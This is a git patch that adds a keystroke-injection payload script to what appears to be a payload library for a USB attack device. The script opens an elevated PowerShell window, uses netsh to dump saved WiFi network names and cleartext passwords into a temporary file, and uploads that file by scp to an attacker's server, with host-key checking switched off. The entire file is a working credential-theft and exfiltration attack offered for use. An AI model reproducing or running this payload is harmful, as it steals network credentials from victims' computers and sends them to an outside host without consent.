From 25b879d4ffaa705328bc931a6bda6fafae26ee48 Mon Sep 17 00:00:00 2001
From: zb0r <114243689+F1ll0ry@users.noreply.github.com>
Date: Thu, 18 Jul 2024 12:04:12 +0300
Subject: [PATCH] Create Payload.txt

---
 .../WiFi-Passwords-Exfiltration/Payload.txt   | 51 +++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt

diff --git a/payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt b/payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt
new file mode 100644
index 0000000..fd772c9
--- /dev/null
+++ b/payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt
@@ -0,0 +1,51 @@
+
+REM Title: WiFi Passwords Exfiltration via SCP
+REM Author: zb0r
+REM Version: 1.0
+REM Description: This script finds WiFi SSIDs and passwords on a Windows machine, saves them to a file, and sends the file to a VPS using SCP.
+REM You need a VPS to use this script. Replace the #VPS_USER with your VPS username, #VPS_PASS with your VPS password, and #VPS_IP with your VPS IP address.
+
+REM Passive Windows Detection Extension
+EXTENSION PASSIVE_WINDOWS_DETECT
+
+DEFINE #VPS_IP 22.22.22.22
+DEFINE #VPS_USER testuser
+DEFINE #VPS_PASS testpassword
+
+REM Open PowerShell as admin
+GUI r
+DELAY 500
+STRING powershell
+CTRL SHIFT ENTER
+DELAY 1000
+LEFT
+DELAY 500
+ENTER
+DELAY 500
+
+REM Find WiFi profiles and passwords
+STRINGLN $profiles = (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { $_ -replace "    All User Profile     : ", "" } | ForEach-Object { $_.Trim() }
+DELAY 500
+
+STRINGLN $wifiInfo = @()
+DELAY 500
+
+STRINGLN foreach ($profile in $profiles) { $profileName = $profile; $profileInfo = (netsh wlan show profile name=$profile key=clear) | Select-String "SSID", "Key Content"; $wifiInfo += [PSCustomObject]@{ ProfileName = $profileName; Password = $profileInfo -replace ".*Key Content            : ", "" } }
+DELAY 500
+
+REM Save WiFi information to a file
+STRINGLN $filePath = "$env:TEMP\wifi_profiles.txt"
+DELAY 500
+
+STRINGLN $wifiInfo | Format-Table -AutoSize | Out-File -FilePath $filePath
+DELAY 2000
+
+REM Upload the file via SCP to the target server
+STRINGLN scp -o StrictHostKeyChecking=no $filePath #VPS_USER@#VPS_IP:/home/#VPS_USER/Desktop/wifipass.txt
+DELAY 500
+
+REM Enter the VPS password
+STRINGLN #VPS_PASS
+DELAY 1000
+
+STRINGLN EXIT